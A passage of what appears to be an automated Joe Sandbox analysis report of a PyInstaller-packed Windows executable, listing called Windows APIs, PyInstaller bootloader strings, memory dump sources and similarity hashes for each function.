                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE965E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE965FD
                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7ACE868B1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                            • Opcode ID: dd061f857628f8cce594bc41954d9e76e8095696f5180e2e17042c5623d0381d
                                                                                                                                                                                                            • Instruction ID: 10888fb71a76abedbea3f54483dca49de9895716b1a06f1e90fd6b8427e96a6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd061f857628f8cce594bc41954d9e76e8095696f5180e2e17042c5623d0381d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51C235B0F68374FE54B7269A162BAE2559F44BC1FC65031EC0E6B7B6EE2CE4018720

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4718: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA472C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                            • Opcode ID: 6f592b97884ad86c6c5862fa308072426eccbbb8b3cbff7b01d41fc1ca71d458
                                                                                                                                                                                                            • Instruction ID: ac9bf935b0cae6e4f66910006810c6ae978cf18dca6ee422b6086e60a12a7dfd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f592b97884ad86c6c5862fa308072426eccbbb8b3cbff7b01d41fc1ca71d458
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A751A772A0EA42AAE710FF21D5811B9F760FB48745FC64135EA4D976B5DF3CE5008760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2153230061-4158440160
                                                                                                                                                                                                            • Opcode ID: 13762b2058ec530e2b5e413417343aa55c920a4c03f546ab3d2e9fe5047cea8e
                                                                                                                                                                                                            • Instruction ID: 2bf2c02124c62f8ea5b6fad07ba3e8c1b5f6a01171734c86714095ebadadf1dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13762b2058ec530e2b5e413417343aa55c920a4c03f546ab3d2e9fe5047cea8e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53519272A0E682A6EB54EF24D55017CB3A0FF48B49B969135D90DA73B9DF3CE440CB60

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                            • API String ID: 0-666925554
                                                                                                                                                                                                            • Opcode ID: 3b2bdab1e2625c01a1f45d967a760f062dcd1c0112ef139deb3c6ade96a22823
                                                                                                                                                                                                            • Instruction ID: a7fc1a1fd731f13f7e876c85c43d5293fea151095c3938a644b0df026b126a96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b2bdab1e2625c01a1f45d967a760f062dcd1c0112ef139deb3c6ade96a22823
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851CC71B0E782A5EA10BB11E6046B9F3A0AF41BE6F860031DD0D677B6EE3CE1458760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                            • API String ID: 4998090-2855260032
                                                                                                                                                                                                            • Opcode ID: af43192e558f9788d8e79a42a8209ba7990e18510bead9af3882adaa3d55134e
                                                                                                                                                                                                            • Instruction ID: 969b948f3fdb2a544950ed6ba1935ade683a4ef494db15deae2b2830ab80e4c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af43192e558f9788d8e79a42a8209ba7990e18510bead9af3882adaa3d55134e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A53261D782A6E750AF11E4446AAF361FB84795F850231FA5E67AF4DF3CD408CB10

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                            • Opcode ID: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction ID: 4f9e873300a92253e0117d9ded76cb3d5eae266f2d8749af7d48b1a5b51708c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9415F32A0D7C2A6EA20EB20F4552AEF3A4FBD4341F810135E69D67BA5DF7CD1548B50

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE83B80: GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7ACE83885
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                            • API String ID: 2344891160-3602715111
                                                                                                                                                                                                            • Opcode ID: c011bbb1c264114e79645d427b78868edf0acf487d90ef09386e80cb89f30d10
                                                                                                                                                                                                            • Instruction ID: 6459782b4f997882763a611c0427ed71f68e65b52eb2cd9f457faef7723bcbdc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c011bbb1c264114e79645d427b78868edf0acf487d90ef09386e80cb89f30d10
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B1B331A1E6C365FE60BB25DA512BEB290BF40786FC64031E94D676F6EE2CE504C760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: 1.2.12$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-1282086711
                                                                                                                                                                                                            • Opcode ID: 75d1a68724760233d3b72529ab63010b96afae0e80c6ccec508cc015e5722427
                                                                                                                                                                                                            • Instruction ID: 8b557977b753fb909f089ed40b161a4988453b1268fb2e32596d7bc0b018bedb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75d1a68724760233d3b72529ab63010b96afae0e80c6ccec508cc015e5722427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51E332A0E6C2A5EA60BB11E5403BAB2A0BB80795FC64135ED4DA37A5EF3CE445C750

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 3dbd079f25493cb00c0f377b89eb06eb2a655696f53ab85c59b8783cdb1b2f43
                                                                                                                                                                                                            • Instruction ID: e6f249b708edd59c1bfea9a30a6da65c4e7b3ae8e64d566eafbd167c0372c02e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dbd079f25493cb00c0f377b89eb06eb2a655696f53ab85c59b8783cdb1b2f43
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55C1F43290E686A1EA70AB1594442BDF7A0FF81BC0F970571FA4E237B1CE7CE8558761

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C47C
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C507
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            • Opcode ID: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction ID: 976b4d587a1ece77710c3918bf04aa5d5afe6dc9839d870e617b11c08f6cce7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D891F332F0D651A5F760BF2594402BDEBA0BB44B88F965179EE0E736A5CF38D442C720

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B580
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B58A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948DF
                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                            • Opcode ID: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction ID: 6205ec6df0a70a499e3491a645bc1f50fae3bde877d72fe25803a1ac692541d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F11A33260D74292EB64AF14A40113AF7A0FB85771F911235FA9EA59F8EF3CD014CB20
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 09d488bb06d55175f79f30023c2eae0eb1538c267421da5f785fc5d583374eac
                                                                                                                                                                                                            • Instruction ID: 06288fbd5400c77673e17b42f5a7f8a5556b1bbcf222bc7e244591e59de3ca50
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09d488bb06d55175f79f30023c2eae0eb1538c267421da5f785fc5d583374eac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E04F70E0E60266FE18BBF25484079D1905F94741B860070D80DA62B1DE2CE9554670
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FC6
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FD0
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                            • Opcode ID: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction ID: f212e00d94b546897feb5dbb36810383f54acc7c504cc42195d00a107fbcb905
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21A431F1E64261FA90B725948127DD6929F447A0F8A42B5F92F673F1CE6CE8454320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 59b3af13fe784cb7670022fdd077a90ad3e77dba11ba07e1d20d2cc9a011fd15
                                                                                                                                                                                                            • Instruction ID: 502f9ef47861c96b455c7ba7470b68fe3d803cfc4eef2d7cb42edda025b797f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59b3af13fe784cb7670022fdd077a90ad3e77dba11ba07e1d20d2cc9a011fd15
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541E33291E24197EA34EB29A44027DF3A0EB55B80F910571EB8EA36A1CF6DE502C761
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                            • Opcode ID: e4d8a0f1ae197e99e10617596f9b91763f42da5e258ac1e7408b852b43e9147c
                                                                                                                                                                                                            • Instruction ID: 216a54b04a4388f508cd47263ae70df9a4cdc44f0bfe7c0f40d6410a4c57451f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4d8a0f1ae197e99e10617596f9b91763f42da5e258ac1e7408b852b43e9147c
